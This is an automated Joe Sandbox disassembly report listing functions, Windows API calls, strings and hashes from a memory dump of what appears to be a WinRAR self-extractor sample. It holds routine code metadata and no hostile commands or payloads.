<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00FB9760
<html>, xrefs: 00FB9755, 00FB978E
</html>, xrefs: 00FB97B7

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 27a8820d2f535c2fe7aa9534b2ab4a3943335dee21d035df443b8d2d0218e719
Instruction ID: d708d30b12ba13a4364f2eefaf654d1fb22f464fd655d51cd958f1fe65558c51
Opcode Fuzzy Hash: 27a8820d2f535c2fe7aa9534b2ab4a3943335dee21d035df443b8d2d0218e719
Instruction Fuzzy Hash: 82311C3250C3127BD725AB359C47FAF77989F42720F14011EF601961D2EFA8D909ABA6

Function 00FBD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00FBD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00FBD6ED

Part of subcall function 00FB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FAC116,00000000,.exe,?,?,00000800,?,?,?,00FB8E3C), ref: 00FB1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00FBD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00FBD720
GetObjectW.GDI32(00000000,00000018,?), ref: 00FBD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00FBD75D
DeleteObject.GDI32(00000000), ref: 00FBD764
GetWindow.USER32(00000000,00000002), ref: 00FBD76D

Strings

STATIC, xrefs: 00FBD6F3

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: a6a6e58a01ea7e945967b68209e9eae729bacd1934b702af4b987a4b07f6ec2b
Instruction ID: 213622abaad2e3aef1fd8dd78a110f93bd7c51d094d1c69d1ad0add8b9667a44
Opcode Fuzzy Hash: a6a6e58a01ea7e945967b68209e9eae729bacd1934b702af4b987a4b07f6ec2b
Instruction Fuzzy Hash: A7113A725013107FE633AB729C4AFEF7A5CBF44711F004121FA81A6085EA6ECA056FA6

Function 00FC96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FC9705

Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4

_free.LIBCMT ref: 00FC9711
_free.LIBCMT ref: 00FC971C
_free.LIBCMT ref: 00FC9727
_free.LIBCMT ref: 00FC9732
_free.LIBCMT ref: 00FC973D
_free.LIBCMT ref: 00FC9748
_free.LIBCMT ref: 00FC9753
_free.LIBCMT ref: 00FC975E
_free.LIBCMT ref: 00FC976C

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 03adf403c5776fed684c47d0c6574214706cc86e75701fddd0986d6146f6ad05
Instruction ID: 36a0da93b25d09faf3ec422e9db319141ea967269ec80b0c3e9b5f35c3bcf04f
Opcode Fuzzy Hash: 03adf403c5776fed684c47d0c6574214706cc86e75701fddd0986d6146f6ad05
Instruction Fuzzy Hash: E811D77510000AAFCB01EF58DE42ED93BB5EF14390B0254A9FA098F262DE35DA52AB84

Function 00FC2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00FC2F50
___TypeMatch.LIBVCRUNTIME ref: 00FC305E
_UnwindNestedFrames.LIBCMT ref: 00FC31B0
CallUnexpected.LIBVCRUNTIME ref: 00FC31CB
_abort.LIBCMT ref: 00FC31D0

Strings

csm, xrefs: 00FC2EDB
csm, xrefs: 00FC2E6E
csm, xrefs: 00FC2F87

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: d94e94da3e712f58de574c07a472879279b0888902ae464ac4bf66155390fddd
Instruction ID: 05c5c4b99689a40fc3745449452682df6b13081ac8df42ba19cbaecaaa92e55b
Opcode Fuzzy Hash: d94e94da3e712f58de574c07a472879279b0888902ae464ac4bf66155390fddd
Instruction Fuzzy Hash: DDB15A71D0020AEFCF29DFA4CA42EAEB7B5EF04364F14815DE8116B212D739DA51EB91

Function 00FA6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA6FAA
_wcslen.LIBCMT ref: 00FA7013
_wcslen.LIBCMT ref: 00FA7084

Part of subcall function 00FA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FA7AAB
Part of subcall function 00FA7A9C: GetLastError.KERNEL32 ref: 00FA7AF1
Part of subcall function 00FA7A9C: CloseHandle.KERNEL32(?), ref: 00FA7B00

Strings

UNC\, xrefs: 00FA7051
SeCreateSymbolicLinkPrivilege, xrefs: 00FA6FCC
SeRestorePrivilege, xrefs: 00FA6FC2
\??\, xrefs: 00FA702B

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 25ff06761e3fa58d258dcf5a24cbf9f4585a1fa3a262ae879f9a2249f0b54ea6
Instruction ID: e26f291617b2e346669ad083989a5b033e00f38458e206cb90664c3bd3d7cdd9
Opcode Fuzzy Hash: 25ff06761e3fa58d258dcf5a24cbf9f4585a1fa3a262ae879f9a2249f0b54ea6
Instruction Fuzzy Hash: 4A41E4F1D08744BAEB20F7709D82FEE77ACAF06314F044455FA45A6182D778AA48E721

Function 00FBB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370

EndDialog.USER32(?,00000001), ref: 00FBB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00FBB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00FBB650
SetWindowTextW.USER32(?,?), ref: 00FBB661
GetDlgItem.USER32(?,00000065), ref: 00FBB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00FBB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00FBB694

Strings

LICENSEDLG, xrefs: 00FBB5D4

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: e169954f1fb316bd3dac6e6a4985626b4ac39aec1728b8e213e16f9987eaba8c
Instruction ID: 83f2fbe70e961c3ac303c5d9b6566ac8d02e16f2ef6a794cb9ec7e93fdba0aff
Opcode Fuzzy Hash: e169954f1fb316bd3dac6e6a4985626b4ac39aec1728b8e213e16f9987eaba8c
Instruction Fuzzy Hash: 3A21A232604219BFD2229F67ED4AFBB3B6EFB4AB51F010014F6409A094CB969D01FB35

Function 00FBFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,8E54D038,00000001,00000000,00000000,?,?,00FAAF6C,ROOT\CIMV2), ref: 00FBFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00FAAF6C,ROOT\CIMV2), ref: 00FBFE14
SysAllocString.OLEAUT32(00000000), ref: 00FBFE1F
_com_issue_error.COMSUPP ref: 00FBFE48
_com_issue_error.COMSUPP ref: 00FBFE52
GetLastError.KERNEL32(80070057,8E54D038,00000001,00000000,00000000,?,?,00FAAF6C,ROOT\CIMV2), ref: 00FBFE57
_com_issue_error.COMSUPP ref: 00FBFE6A
GetLastError.KERNEL32(00000000,?,?,00FAAF6C,ROOT\CIMV2), ref: 00FBFE80
_com_issue_error.COMSUPP ref: 00FBFE93

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 7d1238aa2fb24526458c62915205a14cb8be114d8b9e75abb648384daf044fb0
Instruction ID: 296fcfb295c0ef2c5955018e0d417ec365936ed76f0e115f1c395cdb3637e90b
Opcode Fuzzy Hash: 7d1238aa2fb24526458c62915205a14cb8be114d8b9e75abb648384daf044fb0
Instruction Fuzzy Hash: 0D411CB1E00219ABC7109F69CC45BEEBBA9EB48720F10823AF905E7251D734D904EFE1

Function 00FAAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FAAF29

Strings

Windows 10, xrefs: 00FAB0C2
Name, xrefs: 00FAB0B0
ROOT\CIMV2, xrefs: 00FAAF5C
WQL, xrefs: 00FAAFDC
SELECT * FROM Win32_OperatingSystem, xrefs: 00FAAFCA

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 2f0c4af956bdeb470ef1fcde79cb60330e0f5fdcfaa0ec1de579c0bfab6fc59d
Instruction ID: ba2162ccbfd18d93bae66de87150e38c7dc683611c6a0a901ed228f25cb8b9fb
Opcode Fuzzy Hash: 2f0c4af956bdeb470ef1fcde79cb60330e0f5fdcfaa0ec1de579c0bfab6fc59d
Instruction Fuzzy Hash: AD718CB1A00219AFDF14DFA4CC959AFB7B9FF4A311B04415EE512A72A0CB30AD05EB61

Function 00FA9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00FA93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00FA93C9

Part of subcall function 00FAC29A: _wcslen.LIBCMT ref: 00FAC2A2

Part of subcall function 00FB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FAC116,00000000,.exe,?,?,00000800,?,?,?,00FB8E3C), ref: 00FB1FD1

_swprintf.LIBCMT ref: 00FA9465

Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

MoveFileW.KERNEL32(?,?), ref: 00FA94D4
MoveFileW.KERNEL32(?,?), ref: 00FA9514

Strings

rtmp%d, xrefs: 00FA944E

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 54de9f81880a0e07a36a2d42cfa0922f91b4f48941aafc784da64ab7260dd2b7
Instruction ID: 107cfa99944c5fed91d705ebfb38a66af7e2b8bb33779b8fffc4ab2da4994720
Opcode Fuzzy Hash: 54de9f81880a0e07a36a2d42cfa0922f91b4f48941aafc784da64ab7260dd2b7
Instruction Fuzzy Hash: 0E4174F1D0425869CF21EBA0CC45ADE73BDAF46340F0488B5B609E3051EB788B89EB60

Function 00FB1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00FB122E

Part of subcall function 00FAB146: GetVersionExW.KERNEL32(?), ref: 00FAB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00FB1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00FB1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00FB1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00FB12CF
__aullrem.LIBCMT ref: 00FB1379

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 34fdac94e065e2196f6ea6349fec9e10da35fd2d2c8ae410fb542b69dd8e6df1
Instruction ID: 2b4c2d74e64d2d6fc045c467f1783291c6de0c5d741899cee1e51cde923b4892
Opcode Fuzzy Hash: 34fdac94e065e2196f6ea6349fec9e10da35fd2d2c8ae410fb542b69dd8e6df1
Instruction Fuzzy Hash: 5D41F8B19083069FC710DF65C8849ABBBE9FB88314F44892EF596C2650E738E549EF52

Function 00FA2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FA2536

Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

Part of subcall function 00FB05DA: _wcslen.LIBCMT ref: 00FB05E0

Strings

x%u, xrefs: 00FA26FD
;%u, xrefs: 00FA2523
xc%u, xrefs: 00FA275A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 27459187cfc9ad7062439429ae93a3b433d73fa984c3b0e9dfb42b03db7e7b1d
Instruction ID: 0ff83809c2033c2dfd796f0b6129be5238e10f5a2def25d570b31a79becd2c50
Opcode Fuzzy Hash: 27459187cfc9ad7062439429ae93a3b433d73fa984c3b0e9dfb42b03db7e7b1d
Instruction Fuzzy Hash: D2F14BF0B043809BCB14DF2C8895BFE77996F92310F08456DFD869B243CB689945E7A2

Function 00FB9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB9D0A

Strings

>, xrefs: 00FB9D4B
</style>, xrefs: 00FB9E52
</p>, xrefs: 00FB9DE8
<style>, xrefs: 00FB9E30
<br>, xrefs: 00FB9DFE

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: d3d1b89d122a0cc17ec1e437f531882d084b55cbc0f5ed2bbb9abadb4d10fb4e
Instruction ID: 8e93c08f262b3211d11929de971c1f82771e12b8dedca03c05bf8c20b425fa2c
Opcode Fuzzy Hash: d3d1b89d122a0cc17ec1e437f531882d084b55cbc0f5ed2bbb9abadb4d10fb4e
Instruction Fuzzy Hash: 1451F856B4832295DB309A279C117F673E1DFA5770F68441AFBC18B2C0FBE9CC41AA61

Function 00FCF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00FCFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00FCF6CF
__fassign.LIBCMT ref: 00FCF74A
__fassign.LIBCMT ref: 00FCF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00FCF78B
WriteFile.KERNEL32(?,00000000,00000000,00FCFE02,00000000,?,?,?,?,?,?,?,?,?,00FCFE02,00000000), ref: 00FCF7AA
WriteFile.KERNEL32(?,00000000,00000001,00FCFE02,00000000,?,?,?,?,?,?,?,?,?,00FCFE02,00000000), ref: 00FCF7E3

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c4e74556a2b5f6022be67658db685d033709dae1f5d649879f88cccb4abc0d41
Instruction ID: eab53a6e15206daf5ad0286656350e17e28aad01a1cbef315f4e13c0a8ab89ef
Opcode Fuzzy Hash: c4e74556a2b5f6022be67658db685d033709dae1f5d649879f88cccb4abc0d41
Instruction Fuzzy Hash: BE5170B1D0024A9FCB10CFA4D946FEEFBB5EF09310F14416AE555E7291D670A944DBA0

Function 00FC2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00FC2937
___except_validate_context_record.LIBVCRUNTIME ref: 00FC293F
_ValidateLocalCookies.LIBCMT ref: 00FC29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00FC29F3
_ValidateLocalCookies.LIBCMT ref: 00FC2A48

Strings

csm, xrefs: 00FC29DD

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a5f28cf174a3c4d793d300c1d889856764e2ef014f5654525f2e3df1ef2814f6
Instruction ID: a3e2efac2c42ab7b364b7d764dd994a23bebfe6697d790cdb294a5b2c512249b
Opcode Fuzzy Hash: a5f28cf174a3c4d793d300c1d889856764e2ef014f5654525f2e3df1ef2814f6
Instruction Fuzzy Hash: 2341C534E0020AAFCF50DF28C982F9E7BB1EF44324F14805AE8156B392DB75DA15EB91

Function 00FB9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00FB9EEE
GetWindowRect.USER32(?,00000000), ref: 00FB9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00FB9FDB
SetWindowTextW.USER32(?,00000000), ref: 00FB9FE3
ShowWindow.USER32(00000000,00000005), ref: 00FB9FF9

Strings

RarHtmlClassName, xrefs: 00FB9FA5

Memory Dump Source

